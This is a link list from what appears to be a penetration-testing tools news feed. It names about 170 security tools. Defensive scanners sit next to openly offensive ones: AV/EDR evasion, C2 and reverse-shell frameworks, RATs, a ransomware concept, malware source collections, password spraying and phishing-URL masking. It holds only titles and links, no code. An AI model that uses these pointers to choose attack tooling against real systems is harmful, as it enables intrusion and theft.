- [ImHex - A Hex Editor For Reverse Engineers, Programmers And People That Value Their Eye Sight When Working At 3 AM.](http://feedproxy.google.com/~r/PentestTools/~3/MEKCME9Jru0/imhex-hex-editor-for-reverse-engineers.html)
- [MyJWT - A Cli For Cracking, Testing Vulnerabilities On Json Web Token (JWT)](http://feedproxy.google.com/~r/PentestTools/~3/3sUS0FB1PVM/myjwt-cli-for-cracking-testing.html)
- [SysWhispers2 - AV/EDR Evasion Via Direct System Calls](http://feedproxy.google.com/~r/PentestTools/~3/qHPSQQ3Dfnk/syswhispers2-avedr-evasion-via-direct.html)
- [ByteDance-HIDS - A Cloud-Native Host-Based Intrusion Detection Solution Project To Provide Next-Generation Threat Detection And Behavior Audition With Modern Architecture](http://feedproxy.google.com/~r/PentestTools/~3/iHZVuKM6mFw/bytedance-hids-cloud-native-host-based.html)
- [Ssh-Mitm - Ssh Mitm Server For Security Audits Supporting Public Key Authentication, Session Hijacking And File Manipulation](http://feedproxy.google.com/~r/PentestTools/~3/fE746JqiQ0w/ssh-mitm-ssh-mitm-server-for-security.html)
- [Stegbrute - Fast Steganography Bruteforce Tool Written In Rust Useful For CTF's](http://feedproxy.google.com/~r/PentestTools/~3/i_yWwpE2hEE/stegbrute-fast-steganography-bruteforce.html)
- [Pineapple-MK7-REST-Client - WiFi Hacking Workflow With Pineapple Mark 7 API](http://feedproxy.google.com/~r/PentestTools/~3/PnTTUKe8nqE/pineapple-mk7-rest-client-wifi-hacking.html)
- [K55 - Linux X86_64 Process Injection Utility | Manipulate Processes With Customized Payloads](http://feedproxy.google.com/~r/PentestTools/~3/WY4KTH4TcNA/k55-linux-x8664-process-injection.html)
- [Umbrella_android - Digital And Physical Security Advice App](http://feedproxy.google.com/~r/PentestTools/~3/4VOlWJ1W13I/umbrellaandroid-digital-and-physical.html)
- [RadareEye - A Tool Made For Specially Scanning Nearby devices [BLE, Bluetooth And Wifi] And Execute Our Given Command On Our System When The Target Device Comes In-Between Range](http://feedproxy.google.com/~r/PentestTools/~3/dOPuLqrdJTU/radareeye-tool-made-for-specially.html)
- [ProtOSINT - A Python Script That Helps You Investigate Protonmail Accounts And ProtonVPN IP Addresses](http://feedproxy.google.com/~r/PentestTools/~3/w_gAtP5rcsI/protosint-python-script-that-helps-you.html)
- [Sigurls - A Reconnaissance Tool, It Fetches URLs From AlienVault's OTX, Common Crawl, URLScan, Github And The Wayback Machine](http://feedproxy.google.com/~r/PentestTools/~3/2AYLo3PYf6k/sigurls-reconnaissance-tool-it-fetches.html)
- [pongoOS - A Pre-Boot Execution Environment For Apple Boards](http://feedproxy.google.com/~r/PentestTools/~3/mhQV1LrK33I/pongoos-pre-boot-execution-environment.html)
- [Wprecon - A Vulnerability Recognition Tool In CMS Wordpress, 100% Developed In Go](http://feedproxy.google.com/~r/PentestTools/~3/3Hc-uWyPQPs/wprecon-vulnerability-recognition-tool.html)
- [MUD-Visualizer - A Tool To Visualize MUD Files](http://feedproxy.google.com/~r/PentestTools/~3/83ao2eAgl_k/mud-visualizer-tool-to-visualize-mud.html)
- [Pidrila - Python Interactive Deepweb-oriented Rapid Intelligent Link Analyzer](http://feedproxy.google.com/~r/PentestTools/~3/yt-yLx0j_5o/pidrila-python-interactive-deepweb.html)
- [Longtongue - Customized Password/Passphrase List Inputting Target Info](http://feedproxy.google.com/~r/PentestTools/~3/9yImjpmkqtE/longtongue-customized.html)
- [Emp3R0R - Linux Post-Exploitation Framework Made By Linux User](http://feedproxy.google.com/~r/PentestTools/~3/edR6AHlHlo4/emp3r0r-linux-post-exploitation.html)
- [Solarflare - SolarWinds Orion Account Audit / Password Dumping Utility](http://feedproxy.google.com/~r/PentestTools/~3/I2erzARfPEE/solarflare-solarwinds-orion-account.html)
- [Exif-Gps-Tracer - A Python Script Which Allows You To Parse GeoLocation Data From Your Image Files Stored In A dataset](http://feedproxy.google.com/~r/PentestTools/~3/XKU97531Cbc/exif-gps-tracer-python-script-which.html)
- [UhOh365 - A Script That Can See If An Email Address Is Valid In Office365 (User/Email Enumeration)](http://feedproxy.google.com/~r/PentestTools/~3/22qgIrh3avY/uhoh365-script-that-can-see-if-email.html)
- [Sarenka - OSINT Tool - Data From Services Like Shodan, Censys Etc. In One Place](http://feedproxy.google.com/~r/PentestTools/~3/SCHkWvbYeLQ/sarenka-osint-tool-data-from-services.html)
- [Hack-Tools v0.3.0 - The All-In-One Red Team Extension For Web Pentester](http://feedproxy.google.com/~r/PentestTools/~3/Pnpbqa34VOo/hack-tools-v030-all-in-one-red-team.html)
- [MaskPhish - Give A Mask To Phishing URL](http://feedproxy.google.com/~r/PentestTools/~3/C2ylG7pQvrQ/maskphish-give-mask-to-phishing-url.html)
- [Drow - Injects Code Into ELF Executables Post-Build](http://feedproxy.google.com/~r/PentestTools/~3/gZ2KV4k-9kM/drow-injects-code-into-elf-executables.html)
- [EvtMute - Apply A Filter To The Events Being Reported By Windows Event Logging](http://feedproxy.google.com/~r/PentestTools/~3/xQrMQYvECAw/evtmute-apply-filter-to-events-being.html)
- [XSS-Scanner - XSS Scanner That Detects Cross-Site Scripting Vulnerabilities In Website By Injecting Malicious Scripts](http://feedproxy.google.com/~r/PentestTools/~3/ZtLP1ORFzS4/xss-scanner-xss-scanner-that-detects.html)
- [MOSINT - OSINT Tool For Emails](http://feedproxy.google.com/~r/PentestTools/~3/L7PwMQRdXbw/mosint-osint-tool-for-emails.html)
- [Urlhunter - A Recon Tool That Allows Searching On URLs That Are Exposed Via Shortener Services](http://feedproxy.google.com/~r/PentestTools/~3/Ze_sojg7kRk/urlhunter-recon-tool-that-allows.html)
- [Byp4Xx - Simple Bash Script To Bypass "403 Forbidden" Messages With Well-Known Methods Discussed In #Bugbountytips](http://feedproxy.google.com/~r/PentestTools/~3/PDCrQEvU6fQ/byp4xx-simple-bash-script-to-bypass-403.html)
- [HyperDbg - The Source Code Of HyperDbg Debugger](http://feedproxy.google.com/~r/PentestTools/~3/WcK2JgH1dTw/hyperdbg-source-code-of-hyperdbg.html)
- [Oblivion - Data Leak Checker And OSINT Tool](http://feedproxy.google.com/~r/PentestTools/~3/l7XtrKKYQQg/oblivion-data-leak-checker-and-osint.html)
- [RogueWinRM - Windows Local Privilege Escalation From Service Account To System](http://feedproxy.google.com/~r/PentestTools/~3/ZR48DN8LD9w/roguewinrm-windows-local-privilege.html)
- [Top 20 Most Popular Hacking Tools in 2020](http://feedproxy.google.com/~r/PentestTools/~3/e8MNasqLM74/top-20-most-popular-hacking-tools-in.html)
- [Wynis - Audit Windows Security With Best Practice](http://feedproxy.google.com/~r/PentestTools/~3/oPaoe39o2BU/wynis-audit-windows-security-with-best.html)
- [Proxify - Swiss Army Knife Proxy Tool For HTTP/HTTPS Traffic Capture, Manipulation, And Replay On The Go](http://feedproxy.google.com/~r/PentestTools/~3/hYIf0RbmMzc/proxify-swiss-army-knife-proxy-tool-for.html)
- [Social-Analyzer - API And Web App For Analyzing And Finding A Person Profile Across +300 Social Media Websites (Detections Are Updated Regularly)](http://feedproxy.google.com/~r/PentestTools/~3/kXzr1LAzNS0/social-analyzer-api-and-web-app-for.html)
- [ApkLeaks - Scanning APK File For URIs, Endpoints And Secrets](http://feedproxy.google.com/~r/PentestTools/~3/cjv6czeOzl4/apkleaks-scanning-apk-file-for-uris.html)
- [Aura - Python Source Code Auditing And Static Analysis On A Large Scale](http://feedproxy.google.com/~r/PentestTools/~3/3dCdN0wPQy0/aura-python-source-code-auditing-and.html)
- [Vulmap - Web Vulnerability Scanning And Verification Tools](http://feedproxy.google.com/~r/PentestTools/~3/ZY2bsPn-m08/vulmap-web-vulnerability-scanning-and.html)
- [Censys-Python - An Easy-To-Use And Lightweight API Wrapper For The Censys Search Engine](http://feedproxy.google.com/~r/PentestTools/~3/enuM2IsKXsY/censys-python-easy-to-use-and.html)
- [Swego - Swiss Army Knife Webserver In Golang](http://feedproxy.google.com/~r/PentestTools/~3/aYheVURWxao/swego-swiss-army-knife-webserver-in.html)
- [GRecon - Your Google Recon Is Now Automated](http://feedproxy.google.com/~r/PentestTools/~3/ucwiubifmO4/grecon-your-google-recon-is-now.html)
- [Kenzer - Automated Web Assets Enumeration And Scanning](http://feedproxy.google.com/~r/PentestTools/~3/UatODvipiLw/kenzer-automated-web-assets-enumeration.html)
- [Grawler - Tool Which Comes With A Web Interface That Automates The Task Of Using Google Dorks, Scrapes The Results, And Stores Them In A File](http://feedproxy.google.com/~r/PentestTools/~3/7bBN-zmnyww/grawler-tool-which-comes-with-web.html)
- [0D1N v3.4 - Tool For Automating Customized Attacks Against Web Applications (Full Made In C Language With Pthreads, Have A Fast Performance)](http://feedproxy.google.com/~r/PentestTools/~3/FCcpoal9Cig/0d1n-v34-tool-for-automating-customized.html)
- [SharpMapExec - A Sharpen Version Of CrackMapExec](http://feedproxy.google.com/~r/PentestTools/~3/IwawNZ1bDts/sharpmapexec-sharpen-version-of.html)
- [Watcher - Open Source Cybersecurity Threat Hunting Platform](http://feedproxy.google.com/~r/PentestTools/~3/drRIztOpARs/watcher-open-source-cybersecurity.html)
- [Sploit - Go Package That Aids In Binary Analysis And Exploitation](http://feedproxy.google.com/~r/PentestTools/~3/QuoarhC16a8/sploit-go-package-that-aids-in-binary.html)
- [Fawkes - Tool To Search For Targets Vulnerable To SQL Injection (Performs The Search Using Google Search Engine)](http://feedproxy.google.com/~r/PentestTools/~3/7Iz9EoTwNq0/fawkes-tool-to-search-for-targets.html)
- [Bheem - Simple Collection Of Small Bash-Scripts Which Runs Iteratively To Carry Out Various Tools And Recon Process](http://feedproxy.google.com/~r/PentestTools/~3/BpZ-AvuTgL4/bheem-simple-collection-of-small-bash.html)
- [Bento - A Minimal Fedora-Based Container For Penetration Tests And CTF With The Sweet Addition Of GUI Applications](http://feedproxy.google.com/~r/PentestTools/~3/4JwqTihMnZY/bento-minimal-fedora-based-container.html)
- [Scilla - Information Gathering Tool (DNS/Subdomain/Port Enumeration)](http://feedproxy.google.com/~r/PentestTools/~3/InyhCsWhDlk/scilla-information-gathering-tool.html)
- [Go365 - An Office365 User Attack Tool](http://feedproxy.google.com/~r/PentestTools/~3/ItqU-jUcZs8/go365-office365-user-attack-tool.html)
- [E9Patch - A Powerful Static Binary Rewriting Tool](http://feedproxy.google.com/~r/PentestTools/~3/dhBRMqx2ROA/e9patch-powerful-static-binary.html)
- [PoshBot - Powershell-based Bot Framework](http://feedproxy.google.com/~r/PentestTools/~3/ikhDVgrscXM/poshbot-powershell-based-bot-framework.html)
- [Freki - Malware Analysis Platform](http://feedproxy.google.com/~r/PentestTools/~3/MLNVFfU75oI/freki-malware-analysis-platform.html)
- [Ghost Framework - An Android Post-Exploitation Framework That Exploits The Android Debug Bridge To R emotely Access An Android Device](http://feedproxy.google.com/~r/PentestTools/~3/AdtTp3q8crU/ghost-framework-android-post.html)
- [APKLab - Android Reverse Engineering WorkBench For VS Code](http://feedproxy.google.com/~r/PentestTools/~3/xTftfJ4sHT0/apklab-android-reverse-engineering.html)
- [ToRat - A Remote Administation Tool Written In Go Using Tor As A Transport Mechanism And RPC For Communication](http://feedproxy.google.com/~r/PentestTools/~3/zs12vFmotPE/torat-remote-administation-tool-written.html)
- [WSMan-WinRM - A Collection Of Proof-Of-Concept Source Code And Scripts For Executing Remote Commands Over WinRM Using The WSMan.Automation COM Object](http://feedproxy.google.com/~r/PentestTools/~3/Q5b7IsAJ41Y/wsman-winrm-collection-of-proof-of.html)
- [Stegseek - Worlds Fastest Steghide Cracker, Chewing Through Millions Of Passwords Per Second](http://feedproxy.google.com/~r/PentestTools/~3/tyq1w_6VwRs/stegseek-worlds-fastest-steghide.html)
- [Slipstream - NAT Slipstreaming Allows An Attacker To Remotely Access Any TCP/UDP Services Bound To A Victim Machine, Bypassing The Victim's NAT/firewall, Just By The Victim Visiting A Website](http://feedproxy.google.com/~r/PentestTools/~3/hNPVruyRjzs/slipstream-nat-slipstreaming-allows.html)
- [403Bypasser - Burpsuite Extension To Bypass 403 Restricted Directory](http://feedproxy.google.com/~r/PentestTools/~3/OAgXURp5RYE/403bypasser-burpsuite-extension-to.html)
- [Gustave - Embedded OS kernel fuzzer](http://feedproxy.google.com/~r/PentestTools/~3/nqOxWYeH-vE/gustave-embedded-os-kernel-fuzzer.html)
- [Carnivore - Tool For Assessing On-Premises Microsoft Servers Authentication Such As ADFS, Skype, Exchange, And RDWeb](http://feedproxy.google.com/~r/PentestTools/~3/eop7VIkun_w/carnivore-tool-for-assessing-on.html)
- [Sak1To-Shell - Multi-threaded C2 Server And Reverse Shell Client Written In Pure C](http://feedproxy.google.com/~r/PentestTools/~3/cTU1VhZjTJY/sak1to-shell-multi-threaded-c2-server.html)
- [DarkSide - Tool Information Gathering And Social Engineering](http://feedproxy.google.com/~r/PentestTools/~3/zwdDNLY4VUk/darkside-tool-information-gathering-and.html)
- [RESTler - The First Stateful REST API Fuzzing Tool For Automatically Testing Cloud Services Through Their REST APIs And Finding Security And Reliability Bugs In These Services](http://feedproxy.google.com/~r/PentestTools/~3/8HilSKQGlWc/restler-first-stateful-rest-api-fuzzing.html)
- [Depix - Recovers Passwords From Pixelized Screenshots](http://feedproxy.google.com/~r/PentestTools/~3/P12HhPhZPUg/depix-recovers-passwords-from-pixelized.html)
- [Packer-Fuzzer - A Fast And Efficient Scanner For Security Detection Of Websites Constructed By Javascript Module Bundler Such As Webpack](http://feedproxy.google.com/~r/PentestTools/~3/IefH1G1qY6k/packer-fuzzer-fast-and-efficient.html)
- [Wp_Hunter - Static Analysis Of Wordpress Plugins](http://feedproxy.google.com/~r/PentestTools/~3/g0LlK6kSZbg/wphunter-static-analysis-of-wordpress.html)
- [Baphomet - Basic Concept Of How A Ransomware Works](http://feedproxy.google.com/~r/PentestTools/~3/uMW8jnygHqo/baphomet-basic-concept-of-how.html)
- [Js-X-Ray - JavaScript And Node.js Open-Source SAST Scanner (A Static Analysis Of Detecting Most Common Malicious Patterns)](http://feedproxy.google.com/~r/PentestTools/~3/4SCEsiCbZsM/js-x-ray-javascript-and-nodejs-open.html)
- [Hijackthis - A Free Utility That Finds Malware, Adware And Other Security Threats](http://feedproxy.google.com/~r/PentestTools/~3/201lt58YSxo/hijackthis-free-utility-that-finds.html)
- [Karkinos - Penetration Testing And Hacking CTF's Swiss Army Knife With: Reverse Shell Handling - Encoding/Decoding - Encryption/Decryption - Cracking Hashes / Hashing](http://feedproxy.google.com/~r/PentestTools/~3/0lqZj1pmFRg/karkinos-penetration-testing-and.html)
- [ADSearch - A Tool To Help Query AD Via The LDAP Protocol](http://feedproxy.google.com/~r/PentestTools/~3/UPDX62Eqt9A/adsearch-tool-to-help-query-ad-via-ldap.html)
- [Obfuscator - The Program Is Designed To Obfuscate The Shellcode](http://feedproxy.google.com/~r/PentestTools/~3/uPjxv7HTCc4/obfuscator-program-is-designed-to.html)
- [Pytmipe - Python Library And Client For Token Manipulations And Impersonations For Privilege Escalation On Windows](http://feedproxy.google.com/~r/PentestTools/~3/UJ7Z3yEYVEo/pytmipe-python-library-and-client-for.html)
- [Enum4Linux-Ng - A Next Generation Version Of Enum4Linux (A Windows/Samba Enumeration Tool) With Additional Features Like JSON/YAML Export](http://feedproxy.google.com/~r/PentestTools/~3/wBUs6t3ZVR8/enum4linux-ng-next-generation-version.html)
- [Hacktory platform packed with new game-playing features](http://feedproxy.google.com/~r/PentestTools/~3/XJZmMe2zRYc/hacktory-platform-packed-with-new-game.html)
- [Aclpwn.Py - Active Directory ACL Exploitation With BloodHound](http://feedproxy.google.com/~r/PentestTools/~3/d4MkUiImWAg/aclpwnpy-active-directory-acl.html)
- [JSFScan.sh - Automation For Javascript Recon In Bug Bounty](http://feedproxy.google.com/~r/PentestTools/~3/SfJh6k_pB7I/jsfscansh-automation-for-javascript.html)
- [Fast-Security-Scanners - Security Checks For Your Researches](http://feedproxy.google.com/~r/PentestTools/~3/Ux2JT4cmLP0/fast-security-scanners-security-checks.html)
- [Hacktory platform packed with new game-playing features](http://feedproxy.google.com/~r/PentestTools/~3/XJZmMe2zRYc/hacktory-platform-packed-with-new-game.html)
- [Terrascan - Detect Compliance And Security Violations Across Infrastructure As Code To Mitigate Risk Before Provisioning Cloud Native Infrastructure](http://feedproxy.google.com/~r/PentestTools/~3/9sfAtOR1icM/terrascan-detect-compliance-and.html)
- [OnionSearch - A Script That Scrapes Urls On Different .Onion Search Engines](http://feedproxy.google.com/~r/PentestTools/~3/If8UWYdevXs/onionsearch-script-that-scrapes-urls-on.html)
- [GG-AESY - Hide Cool Stuff In Images](http://feedproxy.google.com/~r/PentestTools/~3/lK20jOf8J9Q/gg-aesy-hide-cool-stuff-in-images.html)
- [Fortiscan - A High Performance FortiGate SSL-VPN Vulnerability Scanning And Exploitation Tool](http://feedproxy.google.com/~r/PentestTools/~3/y67FPTjfPBg/fortiscan-high-performance-fortigate.html)
- [Admin-Scanner - This Tool Is Design To Find Admin Panel Of Any Website By Using Custom Wordlist Or Default Wordlist Easily](http://feedproxy.google.com/~r/PentestTools/~3/MVzNQiWJ3DA/admin-scanner-this-tool-is-design-to.html)
- [Talon - A Password Guessing Tool That Targets The Kerberos And LDAP Services Within The Windows Active Directory Environment](http://feedproxy.google.com/~r/PentestTools/~3/waBP2FQOsGc/talon-password-guessing-tool-that.html)
- [Webscan - Browser-based Network Scanner And local-IP Detection](http://feedproxy.google.com/~r/PentestTools/~3/1BygnwO-C9g/webscan-browser-based-network-scanner.html)
- [Tracee - Container And System Event Tracing Using eBPF](http://feedproxy.google.com/~r/PentestTools/~3/xBHqF9uhG3I/tracee-container-and-system-event.html)
- [DNSx - A Fast And Multi-Purpose DNS Toolkit Allow To Run Multiple DNS Queries Of Your Choice With A List Of User-Supplied Resolvers](http://feedproxy.google.com/~r/PentestTools/~3/5hz0kQcr9zE/dnsx-fast-and-multi-purpose-dns-toolkit.html)
- [Damn-Vulnerable-Bank - Vulnerable Banking Application For Android](http://feedproxy.google.com/~r/PentestTools/~3/2Miq4-7C-C8/damn-vulnerable-bank-vulnerable-banking.html)
- [N1QLMap - The Tool Exfiltrates Data From Couchbase Database By Exploiting N1QL Injection Vulnerabilities](http://feedproxy.google.com/~r/PentestTools/~3/O33x0AmRMXU/n1qlmap-tool-exfiltrates-data-from.html)
- [Bunkerized-Nginx - Nginx Docker Image Secure By Default](http://feedproxy.google.com/~r/PentestTools/~3/hq2zevJCuyg/bunkerized-nginx-nginx-docker-image.html)
- [RedShell - An interactive command prompt that executes commands through proxychains and automatically logs them on a Cobalt Strike team server](http://feedproxy.google.com/~r/PentestTools/~3/_jOdO4UnpPs/redshell-interactive-command-prompt.html)
- [Wsb-Detect - Tool To Detect If You Are Running In Windows Sandbox ("WSB")](http://feedproxy.google.com/~r/PentestTools/~3/cUt1cqbeX2U/wsb-detect-tool-to-detect-if-you-are.html)
- [UAFuzz - Binary-level Directed Fuzzing For Use-After-Free Vulnerabilities](http://feedproxy.google.com/~r/PentestTools/~3/rBQr1q40rQA/uafuzz-binary-level-directed-fuzzing.html)
- [Xerror - Fully Automated Pentesting Tool](http://feedproxy.google.com/~r/PentestTools/~3/0PcqWQUkcnw/xerror-fully-automated-pentesting-tool.html)
- [ToothPicker - An In-Process, Coverage-Guided Fuzzer For iOS](http://feedproxy.google.com/~r/PentestTools/~3/YU_LRh4VhCw/toothpicker-in-process-coverage-guided.html)
- [Osi.Ig - Information Gathering Instagram](http://feedproxy.google.com/~r/PentestTools/~3/H_EwTL5eRrY/osiig-information-gathering-instagram.html)
- [Amlsec - Automated Security Risk Identification Using AutomationML-based Engineering Data](http://feedproxy.google.com/~r/PentestTools/~3/khxoO8-7vog/amlsec-automated-security-risk.html)
- [SIRAS - Security Incident Response Automated Simulations](http://feedproxy.google.com/~r/PentestTools/~3/YkeE8FOcbT8/siras-security-incident-response.html)
- [Fuzzilli - A JavaScript Engine Fuzzer](http://feedproxy.google.com/~r/PentestTools/~3/SwcA8mqskXY/fuzzilli-javascript-engine-fuzzer.html)
- [Routopsy - A Toolkit Built To Attack Often Overlooked Networking Protocols](http://feedproxy.google.com/~r/PentestTools/~3/tdsh0Kf1ce4/routopsy-toolkit-built-to-attack-often.html)
- [Invoke-Antivm - Powershell Tool For VM Evasion](http://feedproxy.google.com/~r/PentestTools/~3/dbUaZIgy3WQ/invoke-antivm-powershell-tool-for-vm.html)
- [Bulwark - An Organizational Asset And Vulnerability Management Tool, With Jira Integration, Designed For Generating Application Security Reports](http://feedproxy.google.com/~r/PentestTools/~3/EnIG3k5FGRA/bulwark-organizational-asset-and.html)
- [Doctrack - Tool To Manipulate And Insert Tracking Pixels Into Office Open XML Documents (Word, Excel)](http://feedproxy.google.com/~r/PentestTools/~3/oiiyeU7MMjg/doctrack-tool-to-manipulate-and-insert.html)
- [Kali Linux 2020.4 - Penetration Testing and Ethical Hacking Linux Distribution](http://feedproxy.google.com/~r/PentestTools/~3/FjnGJwfZWfU/kali-linux-20204-penetration-testing.html)
- [Teler - Real-time HTTP Intrusion Detection](http://feedproxy.google.com/~r/PentestTools/~3/2oeTpwatLLQ/teler-real-time-http-intrusion-detection.html)
- [OpenEDR - Open EDR Public Repository](http://feedproxy.google.com/~r/PentestTools/~3/W4o5-DazIKY/openedr-open-edr-public-repository.html)
- [Rehex - Reverse Engineers' Hex Editor](http://feedproxy.google.com/~r/PentestTools/~3/w8U1-YLvpqk/rehex-reverse-engineers-hex-editor.html)
- [Gping - Ping, But With A Graph](http://feedproxy.google.com/~r/PentestTools/~3/mLrT0B2unho/gping-ping-but-with-graph.html)
- [MacC2 - Mac Command And Control That Uses Internal API Calls Instead Of Command Line Utilities](http://feedproxy.google.com/~r/PentestTools/~3/MjPG_Kz4lws/macc2-mac-command-and-control-that-uses.html)
- [Garud - An Automation Tool That Scans Sub-Domains, Sub-Domain Takeover And Then Filters Out XSS, SSTI, SSRF And More Injection Point Parameters](http://feedproxy.google.com/~r/PentestTools/~3/Yp2IUMGqTlg/garud-automation-tool-that-scans-sub.html)
- [Go_Parser - Yet Another Golang Binary Parser For IDAPro](http://feedproxy.google.com/~r/PentestTools/~3/r-UPoHO9H9c/goparser-yet-another-golang-binary.html)
- [FinalRecon v1.1.0 - The Last Web Recon Tool You'll Need](http://feedproxy.google.com/~r/PentestTools/~3/GdI0nzebe8E/finalrecon-v110-last-web-recon-tool.html)
- [Trident - Automated Password Spraying Tool](http://feedproxy.google.com/~r/PentestTools/~3/utpWrmEIx2Y/trident-automated-password-spraying-tool.html)
- [Webshell-Analyzer - Web Shell Scanner And Analyzer](http://feedproxy.google.com/~r/PentestTools/~3/9jpCBPI6vyM/webshell-analyzer-web-shell-scanner-and.html)
- [DeepBlueCLI - a PowerShell Module for Threat Hunting via Windows Event Logs](http://feedproxy.google.com/~r/PentestTools/~3/g046hGs6-XY/deepbluecli-powershell-module-for.html)
- [Feroxbuster - A Fast, Simple, Recursive Content Discovery Tool Written In Rust](http://feedproxy.google.com/~r/PentestTools/~3/8LdkAR3EnxM/feroxbuster-fast-simple-recursive.html)
- [Brutto - Easy Brute Forcing To Whatever You Want](http://feedproxy.google.com/~r/PentestTools/~3/MOxwRC0d2bE/brutto-easy-brute-forcing-to-whatever.html)
- [SwiftyInsta - Instagram Unofficial Private API Swift](http://feedproxy.google.com/~r/PentestTools/~3/AjmuVpxXbjo/swiftyinsta-instagram-unofficial.html)
- [Kraken - Cross-platform Yara Scanner Written In Go](http://feedproxy.google.com/~r/PentestTools/~3/GKChtuvSOvg/kraken-cross-platform-yara-scanner.html)
- [Tempomail - Generate A Custom Email Address In 1 Second And Receive Emails](http://feedproxy.google.com/~r/PentestTools/~3/Bkhk6dBTp6U/tempomail-generate-custom-email-address.html)
- [GWTMap - Tool to help map the attack surface of Google Web Toolkit](http://feedproxy.google.com/~r/PentestTools/~3/LZkrS6Pg79A/gwtmap-tool-to-help-map-attack-surface.html)
- [Threagile - Agile Threat Modeling Toolkit](http://feedproxy.google.com/~r/PentestTools/~3/PVdhSActFk4/threagile-agile-threat-modeling-toolkit.html)
- [JSMon - JavaScript Change Monitor for BugBounty](http://feedproxy.google.com/~r/PentestTools/~3/lgYTGY_97wo/jsmon-javascript-change-monitor-for.html)
- [Hetty - An HTTP Toolkit For Security Research](http://feedproxy.google.com/~r/PentestTools/~3/eowu9_tSAs0/hetty-http-toolkit-for-security-research.html)
- [ShowStopper - Anti-Debug tricks exploration tool](http://feedproxy.google.com/~r/PentestTools/~3/B5qwngNiy3c/showstopper-anti-debug-tricks.html)
- [PCWT - A Web Application That Makes It Easy To Run Your Pentest And Bug Bounty Projects](http://feedproxy.google.com/~r/PentestTools/~3/C7w7zW8EFnA/pcwt-web-application-that-makes-it-easy.html)
- [ReconNote - Web Application Security Automation Framework Which Recons The Target For Various Assets To Maximize The Attack Surface For Security Professionals & Bug-Hunters](http://feedproxy.google.com/~r/PentestTools/~3/lnzNyLPZlsE/reconnote-web-application-security.html)
- [paradoxiaRAT - Native Windows Remote Access Tool](http://feedproxy.google.com/~r/PentestTools/~3/bqljBWuxsdw/paradoxiarat-native-windows-remote.html)
- [Py3Webfuzz - A Python3 Module To Assist In Fuzzing Web Applications](http://feedproxy.google.com/~r/PentestTools/~3/SZKOSvoAB1U/py3webfuzz-python3-module-to-assist-in.html)
- [NFCGate - An NFC Research Toolkit Application For Android](http://feedproxy.google.com/~r/PentestTools/~3/ZyjlJyXcqXg/nfcgate-nfc-research-toolkit.html)
- [Octopus WAF - Web Application Firewall Made In C Language And Use Libevent](http://feedproxy.google.com/~r/PentestTools/~3/ujeZkpYmPA4/octopus-waf-web-application-firewall.html)
- [Leonidas - Automated Attack Simulation In The Cloud, Complete With Detection Use Cases](http://feedproxy.google.com/~r/PentestTools/~3/oJq2NnmZ_xo/leonidas-automated-attack-simulation-in.html)
- [FAMA - Forensic Analysis For Mobile Apps](http://feedproxy.google.com/~r/PentestTools/~3/t4Bql1kSR7Y/fama-forensic-analysis-for-mobile-apps.html)
- [Scripthunter - Tool To Find JavaScript Files On Websites](http://feedproxy.google.com/~r/PentestTools/~3/VkViPmx5DXY/scripthunter-tool-to-find-javascript.html)
- [Tfsec - Security Scanner For Your Terraform Code](http://feedproxy.google.com/~r/PentestTools/~3/5RkKrls3wJ8/tfsec-security-scanner-for-your.html)
- [Linux-Evil-Toolkit - A Framework That Aims To Centralize, Standardize And Simplify The Use Of Various Security Tools For Pentest Professionals](http://feedproxy.google.com/~r/PentestTools/~3/rUnuJhfQtlU/linux-evil-toolkit-framework-that-aims.html)
- [Herpaderping - Process Herpaderping Bypasses Security Products By Obscuring The Intentions Of A Process](http://feedproxy.google.com/~r/PentestTools/~3/sKlUbPy6Ieo/herpaderping-process-herpaderping.html)
- [JWT-Hack - Tool To En/Decoding JWT, Generate Payload For JWT Attack And Very Fast Cracking(Dict/Brutefoce)](http://feedproxy.google.com/~r/PentestTools/~3/95rgsqXaRZQ/jwt-hack-tool-to-endecoding-jwt.html)
- [Decoder++ - An Extensible Application For Penetration Testers And Software Developers To Decode/Encode Data Into Various Formats](http://feedproxy.google.com/~r/PentestTools/~3/h3xKH6Q_y_A/decoder-extensible-application-for.html)
- [CobaltStrikeScan - Scan Files Or Process Memory For CobaltStrike Beacons And Parse Their Configuration](http://feedproxy.google.com/~r/PentestTools/~3/xcmsnUzdr8k/cobaltstrikescan-scan-files-or-process.html)
- [Manuka - A Modular OSINT Honeypot For Blue Teamers](http://feedproxy.google.com/~r/PentestTools/~3/9cuvAZHnBY8/manuka-modular-osint-honeypot-for-blue.html)
- [Pesidious - Malware Mutation Using Reinforcement Learning And Generative Adversarial Networks](http://feedproxy.google.com/~r/PentestTools/~3/phMJJ_a4bqY/pesidious-malware-mutation-using.html)
- [AutoGadgetFS - USB Testing Made Easy](http://feedproxy.google.com/~r/PentestTools/~3/Wk_mYJIJXU8/autogadgetfs-usb-testing-made-easy.html)
- [NoSQLi - NoSql Injection CLI Tool](http://feedproxy.google.com/~r/PentestTools/~3/43Dzn-as34k/nosqli-nosql-injection-cli-tool.html)
- [GitDorker - A Tool To Scrape Secrets From GitHub Through Usage Of A Large Repository Of Dorks](http://feedproxy.google.com/~r/PentestTools/~3/8Ew9xlU23Vw/gitdorker-tool-to-scrape-secrets-from.html)
- [Oregami - IDA Plugins And Scripts For Analyzing Register Usage Frame](http://feedproxy.google.com/~r/PentestTools/~3/mLRimLDAQJ4/oregami-ida-plugins-and-scripts-for.html)
- [NTLMRawUnHide - A Python3 Script Designed To Parse Network Packet Capture Files And Extract NTLMv2 Hashes In A Crackable Format](http://feedproxy.google.com/~r/PentestTools/~3/INprasEuyDM/ntlmrawunhide-python3-script-designed.html)
- [MalwareSourceCode - Collection Of Malware Source Code For A Variety Of Platforms In An Array Of Different Programming Languages](http://feedproxy.google.com/~r/PentestTools/~3/4YbzsXbzUc4/malwaresourcecode-collection-of-malware.html)
- [Pwndoc - Pentest Report Generator](http://feedproxy.google.com/~r/PentestTools/~3/1oiVz67GocU/pwndoc-pentest-report-generator.html)
- [Zap-Hud - The OWASP ZAP Heads Up Display (HUD)](http://feedproxy.google.com/~r/PentestTools/~3/MOqAzhY47sk/zap-hud-owasp-zap-heads-up-display-hud.html)
- [PatchChecker - Web-based Check For Windows Privesc Vulnerabilities](http://feedproxy.google.com/~r/PentestTools/~3/rmNJiqk38Ys/patchchecker-web-based-check-for.html)
- [Apk-Medit - Memory Search And Patch Tool On Debuggable Apk Without Root & Ndk](http://feedproxy.google.com/~r/PentestTools/~3/fpYnRfgN1ng/apk-medit-memory-search-and-patch-tool.html)
- [SSJ - Your Everyday Linux Distribution Gone Super Saiyan](http://feedproxy.google.com/~r/PentestTools/~3/a0LsYrnc7MY/ssj-your-everyday-linux-distribution.html)
